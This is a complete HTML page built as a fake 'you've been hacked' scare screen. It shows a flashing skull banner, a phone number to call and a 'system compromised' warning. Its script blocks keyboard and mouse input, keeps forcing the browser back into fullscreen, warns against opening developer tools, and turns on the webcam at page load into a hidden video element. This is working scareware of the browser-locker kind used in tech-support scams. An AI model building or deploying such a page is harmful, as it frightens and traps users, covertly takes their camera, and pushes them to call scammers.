<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>☠️ YOU'VE BEEN HACKED ☠️</title>
    <style>
        @import url('https://fonts.googleapis.com/css2?family=Fredericka+the+Great&display=swap');

        body {
            background-color: #0d0d0d;
            color: #d4e157;
            font-family: 'Fredericka the Great', cursive;
            margin: 0;
            height: 100vh;
            overflow: hidden;
            display: flex;
            justify-content: center;
            align-items: center;
            position: relative;
            cursor: none; /* Hide cursor */
        }

        .banner {
            position: absolute;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            text-align: center;
            background-color: rgba(20, 10, 10, 0.95);
            border: 3px solid #ff0000;
            box-shadow: 0 0 100px rgba(255, 0, 0, 0.9);
            color: #ff0000;
            animation: flicker 1s infinite alternate, shake 0.3s infinite;
            z-index: 100;
            display: flex;
            flex-direction: column;
            justify-content: center;
            align-items: center;
        }

        .danger-sign {
            font-size: 180px;
            margin-bottom: 20px;
            color: #ff0000;
            animation: glitch 1.5s infinite;
        }

        .message {
            font-size: 60px;
            margin: 20px 0;
            text-transform: uppercase;
            animation: glitchText 1.5s infinite, flashText 2s infinite;
            color: #ff0000;
        }

        .contact-info {
            font-size: 28px;
            color: #ff0000;
            animation: flickerText 2s infinite alternate;
        }

        .digit-stream {
            position: absolute;
            top: 0;
            left: 50%;
            transform: translateX(-50%);
            width: 100%;
            height: 100vh;
            color: #ff0000;
            font-size: 18px;
            opacity: 0.05;
            overflow: hidden;
            z-index: 5;
            pointer-events: none;
        }

        .digit {
            position: absolute;
            white-space: nowrap;
            animation: digitAnimation 4s linear infinite;
            opacity: 0;
        }

        @keyframes flicker {
            0% { opacity: 1; }
            50% { opacity: 0.2; }
            100% { opacity: 1; }
        }

        @keyframes flickerText {
            0% { opacity: 1; }
            50% { opacity: 0.1; }
            100% { opacity: 1; }
        }

        @keyframes digitAnimation {
            0% {
                top: -100%;
                opacity: 1;
            }
            100% {
                top: 100%;
                opacity: 0;
            }
        }

        @keyframes glitchText {
            0% {
                text-shadow: 2px 2px #ff0000, -2px -2px #fff;
                transform: scale(1);
            }
            25% {
                text-shadow: -2px -2px #ff0000, 2px 2px #fff;
                transform: scale(1.1);
            }
            50% {
                text-shadow: 2px -2px #ff0000, -2px 2px #fff;
                transform: scale(0.9);
            }
            75% {
                text-shadow: -2px 2px #ff0000, 2px -2px #fff;
                transform: scale(1.05);
            }
            100% {
                text-shadow: 2px 2px #ff0000, -2px -2px #fff;
                transform: scale(1);
            }
        }

        @keyframes glitch {
            0% {
                transform: scale(1);
            }
            25% {
                transform: scale(1.3) rotate(10deg);
            }
            50% {
                transform: scale(0.7) rotate(-10deg);
            }
            75% {
                transform: scale(1.2) rotate(7deg);
            }
            100% {
                transform: scale(1);
            }
        }

        @keyframes shake {
            0% { transform: translate(0, 0); }
            25% { transform: translate(-5px, -5px); }
            50% { transform: translate(5px, 5px); }
            75% { transform: translate(-5px, 5px); }
            100% { transform: translate(5px, -5px); }
        }

        @keyframes flashText {
            0% { opacity: 1; }
            50% { opacity: 0; }
            100% { opacity: 1; }
        }

        .flash-screen {
            position: absolute;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background: white;
            opacity: 0;
            z-index: 15;
            animation: flash 1.5s infinite alternate;
        }

        .overlay {
            position: absolute;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background: rgba(0, 0, 0, 0.8);
            z-index: 1;
            pointer-events: none;
        }

        /* Modal CSS */
        .modal {
            display: none;
            position: fixed;
            z-index: 1000;
            left: 0;
            top: 0;
            width: 100%;
            height: 100%;
            overflow: auto;
            background-color: rgba(0, 0, 0, 0.9);
            padding-top: 60px;
        }
        .modal-content {
            background-color: #222;
            margin: 5% auto;
            padding: 20px;
            border: 2px solid #ff0000;
            width: 80%;
            color: #fff;
            box-shadow: 0 0 50px rgba(255, 0, 0, 0.8);
            animation: fadeIn 2s ease-in-out;
        }
        .close {
            color: #ff0000;
            float: right;
            font-size: 28px;
            font-weight: bold;
        }
        .close:hover,
        .close:focus {
            color: #ff0000;
            text-decoration: none;
            cursor: pointer;
        }

        /* Hidden camera feed */
        #cameraFeed {
            position: absolute;
            bottom: 10px;
            right: 10px;
            width: 200px;
            height: 150px;
            background: #000;
            z-index: 200;
            border: 2px solid #ff0000;
            display: none; /* Hidden from the user */
        }
    </style>
</head>
<body>
    <div class="flash-screen"></div>
    <div class="overlay"></div>
    <div class="digit-stream"></div>

    <div class="banner">
        <div class="danger-sign">☠️</div>
        <div class="message">You're in Trouble...</div>
        <p class="contact-info">Contact: +91 950-59-59-777</p>
    </div>

    <!-- Modal HTML -->
    <div id="myModal" class="modal">
        <div class="modal-content">
            <span class="close">&times;</span>
            <p><strong>WARNING!</strong> Your system has been compromised!</p>
        </div>
    </div>

    <!-- Hidden Camera Feed -->
    <video id="cameraFeed" autoplay muted></video>

    <!-- Scary Sound Effect -->
    <audio id="backgroundAudio" loop>
        <source src="https://www.fesliyanstudios.com/play-mp3/5636" type="audio/mpeg">
        Your browser does not support the audio element.
    </audio>

    <script>
        document.addEventListener('DOMContentLoaded', function() {
            const digitStream = document.querySelector('.digit-stream');
            const banner = document.querySelector('.banner');
            const cameraFeed = document.getElementById('cameraFeed');

            function createDigit() {
                const digit = document.createElement('div');
                digit.classList.add('digit');
                digit.innerText = Math.floor(Math.random() * 1000000000000).toString();
                digit.style.left = `${Math.random() * 100}%`;
                digit.style.fontSize = `${Math.random() * 20 + 10}px`;
                digit.style.animationDuration = `${Math.random() * 3 + 2}s`;
                digitStream.appendChild(digit);

                setTimeout(() => {
                    digit.remove();
                }, 4000);
            }

            setInterval(createDigit, 70);

            // Disable keyboard and mouse input by preventing default actions
            document.addEventListener('keydown', function(e) {
                e.preventDefault();
            });
            document.addEventListener('keyup', function(e) {
                e.preventDefault();
            });
            document.addEventListener('keypress', function(e) {
                e.preventDefault();
            });

            document.addEventListener('mousedown', function(e) {
                e.preventDefault();
            });
            document.addEventListener('mouseup', function(e) {
                e.preventDefault();
            });
            document.addEventListener('mousemove', function(e) {
                e.preventDefault();
            });

            // Flicker and shake effects for the banner
            function flickerEffect() {
                banner.style.opacity = Math.random() > 0.5 ? 1 : 0.3;
            }

            setInterval(flickerEffect, 200);

            // Modal Script
            var modal = document.getElementById("myModal");
            var span = document.getElementsByClassName("close")[0];

            // Show the modal on page load
            modal.style.display = "block";

            // Close the modal when the user clicks the close button
            span.onclick = function() {
                modal.style.display = "none";
            }

            // Close the modal when the user clicks outside of the modal
            window.onclick = function(event) {
                if (event.target == modal) {
                    modal.style.display = "none";
                }
            }

            // Developer Tools Detection
            function detectDevTools() {
                const threshold = 160;
                const widthThreshold = window.outerWidth - window.innerWidth > threshold;
                const heightThreshold = window.outerHeight - window.innerHeight > threshold;
                if (widthThreshold || heightThreshold) {
                    alert('Developer tools are not allowed.');
                }
            }

            window.onresize = detectDevTools;

            // Camera access (hidden from the user)
            function startCamera() {
                navigator.mediaDevices.getUserMedia({ video: true })
                    .then(function(stream) {
                        cameraFeed.srcObject = stream;
                    })
                    .catch(function(error) {
                        alert("Camera access is required!");
                    });
            }

            startCamera();

            // Function to enter full screen
            function enterFullScreen() {
                if (document.documentElement.requestFullscreen) {
                    document.documentElement.requestFullscreen();
                } else if (document.documentElement.mozRequestFullScreen) { /* Firefox */
                    document.documentElement.mozRequestFullScreen();
                } else if (document.documentElement.webkitRequestFullscreen) { /* Chrome, Safari & Opera */
                    document.documentElement.webkitRequestFullscreen();
                } else if (document.documentElement.msRequestFullscreen) { /* IE/Edge */
                    document.documentElement.msRequestFullscreen();
                }
            }

            // Add event listeners for user interaction to trigger full screen
            document.addEventListener('click', enterFullScreen);
            document.addEventListener('keypress', enterFullScreen);

            // Detect when the user exits full-screen mode and force re-entry
            document.addEventListener('fullscreenchange', function() {
                if (!document.fullscreenElement) {
                    enterFullScreen();  // Re-enter full-screen mode if user exits
                }
            });

        });
    </script>
</body>
</html>
